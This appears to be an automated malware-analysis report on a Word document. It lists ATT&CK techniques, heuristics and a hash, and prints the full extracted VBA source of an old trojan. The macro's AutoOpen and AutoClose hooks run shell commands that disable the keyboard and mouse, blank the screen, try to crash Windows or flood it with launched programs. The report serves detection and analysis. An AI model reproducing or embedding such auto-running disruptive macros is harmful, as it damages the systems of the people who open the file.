Verdict: MALICIOUS
Risk Score: 220

Malware Insights

MITRE ATT&CK
- T1059.005 Visual Basic
- T1204.002 Malicious File
- T1566.001 Spearphishing Attachment
The sample is a Microsoft Word document containing VBA macros with AutoOpen and AutoClose functions. These macros execute various shell commands, including disabling input devices and launching multiple applications, indicative of a destructive or disruptive payload. The presence of `Shell()` calls and the execution of system utilities strongly suggest a malicious intent to interfere with the user's system operations.
Heuristics (6)
- VBA macros detected (medium; 4 related findings) [OLE_VBA_MACROS]: Document contains VBA macro code.
- Shell() call in VBA (critical) [OLE_VBA_SHELL]: Shell() call in VBA.
- AutoOpen macro (high) [OLE_VBA_AUTOOPEN]: AutoOpen macro.
- Auto_Close macro (high) [OLE_VBA_AUTOCLOSE]: Auto_Close macro.
- VBA p-code auto-exec with execution tokens (high) [OLE_VBA_PCODE_AUTOEXEC_EXEC]: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker (medium) [OLE_LEGACY_WORDBASIC_AUTOEXEC]: OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 1935 bytes |

SHA-256: b24645135fa6df7c065402bc821f29e649cca08e1b39c6309261742a9bf767ab

Preview script (first 1,000 lines of the extracted script):

```vb
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "Module1"
'W97T/6-Trix by Error and Hash from TN
'-----------simply for fun----------
' Warning you now:
' This is a nasty but SIMPLE trojan
'-----------------------------------
Private Declare Function SendMessage Lib "user32" Alias "SendMessageA" _
(ByVal hWnd As Long, ByVal wMsg As Long, ByVal wParam As Long, _
ByVal lParam As Long) As Long
Private Const WM_SYSCOMMAND = &H112&
Private Const SC_MONITORPOWER = &HF170&
Sub AutoOpen()
Call Nukeit
End Sub
Sub AutoClose()
Call Nukeit
End Sub
Function Nukeit()
Randomize Timer
x = Int(Rnd(1) * 5) + 1
If x = 1 Then
'Are you Ambidexterous?
Shell "rundll32 user,swapmousebutton"
End If
If x = 2 Then
'Try typing without a keyboard...and a mouse
Shell "rundll32 keyboard,disable"
Shell "rundll32 mouse,disable"
End If
If x = 3 Then
'WTF happened to my screen!!!
Dim Ret As Long
Ret = SendMessage(-1, WM_SYSCOMMAND, SC_MONITORPOWER, 0&)
End If
If x = 4 Then
'Where did windows Go?!
Shell "rundll32 krnl386.exe,exitkernel"
End If
If x = 5 Then
'Blue screen of DEATH!!!
Shell "rundll32 user,disableoemlayer"
End If
If x = 6 Then
Do While z <> 1000
'Overload windows!!
s = Shell("notepad.exe", vbNormalFocus)
s = Shell("ping.exe", vbNormalFocus)
s = Shell("tracert.exe", vbNormalFocus)
s = Shell("calc.exe", vbNormalFocus)
s = Shell("charmap.exe", vbNormalFocus)
s = Shell("pbrush.exe", vbNormalFocus)
s = Shell("write.exe", vbNormalFocus)
z = z + 1
Loop
End If
End Function
```